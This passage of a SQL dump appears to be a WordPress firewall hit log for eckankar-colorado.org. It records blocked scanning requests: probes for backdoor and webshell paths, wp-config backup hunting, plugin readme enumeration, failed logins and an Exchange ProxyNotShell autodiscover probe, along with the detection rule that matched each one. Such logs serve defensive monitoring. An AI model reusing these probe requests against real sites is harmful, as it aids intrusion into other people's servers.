User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L2hvbWUv\",\"category\":\"brute-force\",\"ssl\":1}'),(134673,1700170304.629140,1700170304.607000,0x00000000000000000000FFFF5B5CFF14,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/fonts.php','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL2ZvbnRzLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(134667,0.000000,1700169694.552983,0x00000000000000000000FFFF2D836CA4,0,200,0,0,0,'https://eckankar-colorado.org/wp-login.php','','Mozilla/5.0','loginFailInvalidUsername',NULL,NULL),(134668,1700169876.962814,1700169876.926100,0x00000000000000000000FFFF5B5CFF14,0,403,0,0,0,'https://eckankar-colorado.org/wp-content/languages/','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWNvbnRlbnQvbGFuZ3VhZ2VzLw==\",\"category\":\"brute-force\",\"ssl\":1}'),(134661,1700168152.666507,1700168152.642700,0x00000000000000000000FFFF624618CB,0,403,0,0,0,'https://eckankar-colorado.org/style.php?sig=update&domain=51.79.124.111','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3N0eWxlLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(133085,1699795942.220634,1699795942.211800,0x00000000000000000000FFFFC2A9AF5D,0,403,0,0,0,'https://eckankar-colorado.org/chosen.php','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L2Nob3Nlbi5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(133075,1699788203.233542,1699788203.230000,0x00000000000000000000FFFF92BE7918,0,200,0,0,0,'https://eckankar-colorado.org/wp-config.old',NULL,'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0','logged:waf','wp-config.php back-up probing','{\"learningMode\":0,\"failedRules\":\"logged|501\",\"paramKey\":\"cmVxdWVzdC5wYXRo\",\"paramValue\":\"L3dwLWNvbmZpZy5vbGQ=\",\"path\":\"L3dwLWNvbmZpZy5vbGQ=\",\"category\":\"discovery-and-probing\",\"ssl\":1}'),(133060,1699787372.290584,1699787372.282000,0x00000000000000000000FFFFC2A9AF1F,0,403,0,0,0,'https://eckankar-colorado.org/text.php',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3RleHQucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(134728,1700192873.410169,1700192873.401200,0x00000000000000000000FFFF55D7A2F3,0,403,0,0,0,'https://eckankar-colorado.org/wp-content/plugins/WordPressCore-1/include.php',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9Xb3JkUHJlc3NDb3JlLTEvaW5jbHVkZS5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(134729,0.000000,1700194661.263624,0x00000000000000000000FFFF4C8278C6,1,200,0,2,0,'https://eckankar-colorado.org/wp-login.php?action=logout&_wpnonce=ed92f67e75','https://eckankar-colorado.org/wp-admin/edit.php?post_type=mec-events','Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/119.0','logout',NULL,NULL),(134730,1700198329.185703,1700198329.176600,0x00000000000000000000FFFF04F0549B,0,403,0,0,0,'https://eckankar-colorado.org/style.php?sig=update&domain=51.79.124.111','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3N0eWxlLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(134733,1700200484.717487,1700200484.709300,0x00000000000000000000FFFFB9C4DC1A,0,200,0,0,0,'https://eckankar-colorado.org/wp-content/plugins/drag-and-drop-multiple-file-upload-contact-form-7/readme.txt',NULL,'Mozilla/5.0 (Macintosh; Intel Mac OS X 13_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36','logged:waf','Readme.txt and debug.log scans','{\"learningMode\":0,\"failedRules\":\"logged|500\",\"paramKey\":\"cmVxdWVzdC51cmk=\",\"paramValue\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9kcmFnLWFuZC1kcm9wLW11bHRpcGxlLWZpbGUtdXBsb2FkLWNvbnRhY3QtZm9ybS03L3JlYWRtZS50eHQ=\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9kcmFnLWFuZC1kcm9wLW11bHRpcGxlLWZpbGUtdXBsb2FkLWNvbnRhY3QtZm9ybS03L3JlYWRtZS50eHQ=\",\"category\":\"discovery-and-probing\",\"ssl\":1}'),(134727,1700192326.801354,1700192326.767400,0x00000000000000000000FFFF29D8BC5C,0,403,0,0,0,'https://eckankar-colorado.org/wp-content/admin.php','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWNvbnRlbnQvYWRtaW4ucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(133302,1699888652.859008,1699888652.850400,0x00000000000000000000FFFF2D89CB43,0,403,0,0,0,'https://eckankar-colorado.org/admin/uploads/images/','http://eckankar-colorado.org/admin/uploads/images/','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L2FkbWluL3VwbG9hZHMvaW1hZ2VzLw==\",\"category\":\"brute-force\",\"ssl\":1}'),(133225,1699888686.305783,1699888686.296500,0x00000000000000000000FFFF2D89CB43,0,403,0,0,0,'https://eckankar-colorado.org/wp-content/plugins/wp-hps/sh/','http://eckankar-colorado.org/wp-content/plugins/wp-hps/sh/','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy93cC1ocHMvc2gv\",\"category\":\"brute-force\",\"ssl\":1}'),(133178,1699888484.062506,1699888484.052600,0x00000000000000000000FFFF2D89CB43,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/class-requests.php','http://eckankar-colorado.org/wp-includes/class-requests.php','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL2NsYXNzLXJlcXVlc3RzLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(133587,1699888544.691631,1699888544.669500,0x00000000000000000000FFFF2D89CB43,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/nav-menu-template.php','http://eckankar-colorado.org/wp-includes/nav-menu-template.php','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL25hdi1tZW51LXRlbXBsYXRlLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(133589,1699888543.993137,1699888543.984500,0x00000000000000000000FFFF2D89CB43,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/ms-settings.php','http://eckankar-colorado.org/wp-includes/ms-settings.php','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL21zLXNldHRpbmdzLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(133588,1699888544.332252,1699888544.323600,0x00000000000000000000FFFF2D89CB43,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/ms-site.php','http://eckankar-colorado.org/wp-includes/ms-site.php','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL21zLXNpdGUucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(133590,1699888543.633798,1699888543.625100,0x00000000000000000000FFFF2D89CB43,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/ms-network.php','http://eckankar-colorado.org/wp-includes/ms-network.php','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL21zLW5ldHdvcmsucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(133591,1699888543.112121,1699888543.087700,0x00000000000000000000FFFF2D89CB43,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/ms-load.php','http://eckankar-colorado.org/wp-includes/ms-load.php','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL21zLWxvYWQucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(133356,1699888634.192156,1699888634.183200,0x00000000000000000000FFFF2D89CB43,0,403,0,0,0,'https://eckankar-colorado.org/wp-admin/includes/class-wp-themes-list-table.php','http://eckankar-colorado.org/wp-admin/includes/class-wp-themes-list-table.php','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWFkbWluL2luY2x1ZGVzL2NsYXNzLXdwLXRoZW1lcy1saXN0LXRhYmxlLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(134757,1700243891.278445,1700243891.268600,0x00000000000000000000FFFFC2261647,0,403,0,0,0,'https://eckankar-colorado.org/admin/plugins/elfinder/connectors/php/connector.php',NULL,'ALittle Client','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"QUxpdHRsZSBDbGllbnQ=\",\"path\":\"L2FkbWluL3BsdWdpbnMvZWxmaW5kZXIvY29ubmVjdG9ycy9waHAvY29ubmVjdG9yLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(134758,1700245761.005107,1700245760.997000,0x00000000000000000000FFFF55D1B0CC,0,200,0,0,0,'https://eckankar-colorado.org/wp-content/plugins/ultimate-member/readme.txt',NULL,'Mozilla/5.0 (Linux; Android 11; ONEPLUS A6013) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Mobile Safari/537.36','logged:waf','Readme.txt and debug.log scans','{\"learningMode\":0,\"failedRules\":\"logged|500\",\"paramKey\":\"cmVxdWVzdC51cmk=\",\"paramValue\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy91bHRpbWF0ZS1tZW1iZXIvcmVhZG1lLnR4dA==\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy91bHRpbWF0ZS1tZW1iZXIvcmVhZG1lLnR4dA==\",\"category\":\"discovery-and-probing\",\"ssl\":1}'),(134784,1700248691.635445,1700248691.627700,0x00000000000000000000FFFF55D1B0CC,0,200,0,0,0,'https://eckankar-colorado.org/wp-content/plugins/essential-addons-for-elementor-lite/readme.txt',NULL,'Mozilla/5.0 (Linux; Android 11; Lenovo YT-J706X) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36','logged:waf','Readme.txt and debug.log scans','{\"learningMode\":0,\"failedRules\":\"logged|500\",\"paramKey\":\"cmVxdWVzdC5wYXRo\",\"paramValue\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9lc3NlbnRpYWwtYWRkb25zLWZvci1lbGVtZW50b3ItbGl0ZS9yZWFkbWUudHh0\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9lc3NlbnRpYWwtYWRkb25zLWZvci1lbGVtZW50b3ItbGl0ZS9yZWFkbWUudHh0\",\"category\":\"discovery-and-probing\",\"ssl\":1}'),(134766,1700247326.453111,1700247326.431300,0x00000000000000000000FFFF5B5CFCA2,0,403,0,0,0,'https://eckankar-colorado.org/wp-admin/images/wp-login.php','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWFkbWluL2ltYWdlcy93cC1sb2dpbi5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(134759,1700245761.004867,1700245760.997000,0x00000000000000000000FFFF55D1B0CC,0,200,0,0,0,'https://eckankar-colorado.org/wp-content/plugins/ultimate-member/readme.txt',NULL,'Mozilla/5.0 (Linux; Android 11; ONEPLUS A6013) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Mobile Safari/537.36','logged:waf','Readme.txt and debug.log scans','{\"learningMode\":0,\"failedRules\":\"logged|500\",\"paramKey\":\"cmVxdWVzdC5wYXRo\",\"paramValue\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy91bHRpbWF0ZS1tZW1iZXIvcmVhZG1lLnR4dA==\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy91bHRpbWF0ZS1tZW1iZXIvcmVhZG1lLnR4dA==\",\"category\":\"discovery-and-probing\",\"ssl\":1}'),(134760,1700246565.619889,1700246565.612100,0x00000000000000000000FFFFA2F3802B,0,403,0,0,0,'https://173.231.231.205/autodiscover/autodiscover.json?%40zdi%2FPowershell=',NULL,'Mozilla/5.0 zgrab/0.x','blocked:waf','Exchange Proxy(Not?)Shell CVE-2022–41040 and CVE-2022–41082','{\"learningMode\":0,\"failedRules\":\"511\",\"paramKey\":\"cmVxdWVzdC5wYXRo\",\"paramValue\":\"L2F1dG9kaXNjb3Zlci9hdXRvZGlzY292ZXIuanNvbg==\",\"path\":\"L2F1dG9kaXNjb3Zlci9hdXRvZGlzY292ZXIuanNvbg==\",\"category\":\"rce\",\"ssl\":1}'),(134761,1700247170.963662,1700247170.954800,0x00000000000000000000FFFF5B5CFCA2,0,403,0,0,0,'https://eckankar-colorado.org/wp-admin/maint/wp-login.php','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWFkbWluL21haW50L3dwLWxvZ2luLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(134804,0.000000,1700288149.369954,0x00000000000000000000FFFFA763AF5B,0,200,0,0,0,'https://eckankar-colorado.org/wp-login.php','','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36','loginFailInvalidUsername',NULL,NULL),(134803,0.000000,1700285749.618766,0x00000000000000000000FFFF50960696,0,200,0,0,0,'https://eckankar-colorado.org/wp-login.php','','Mozilla/5.0 (Windows NT 6.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36','loginFailInvalidUsername',NULL,NULL),(134792,1700275357.347730,1700275357.339900,0x00000000000000000000FFFFD9A03CA2,0,200,0,0,0,'https://eckankar-colorado.org/wp-content/plugins/paid-memberships-pro/readme.txt',NULL,'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36','logged:waf','Readme.txt and debug.log scans','{\"learningMode\":0,\"failedRules\":\"logged|500\",\"paramKey\":\"cmVxdWVzdC51cmk=\",\"paramValue\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9wYWlkLW1lbWJlcnNoaXBzLXByby9yZWFkbWUudHh0\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9wYWlkLW1lbWJlcnNoaXBzLXByby9yZWFkbWUudHh0\",\"category\":\"discovery-and-probing\",\"ssl\":1}'),(134762,1700247164.024218,1700247164.010000,0x00000000000000000000FFFF5B5CFCA2,0,403,0,0,0,'https://eckankar-colorado.org/wp-admin/maint/wp-login.php','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious 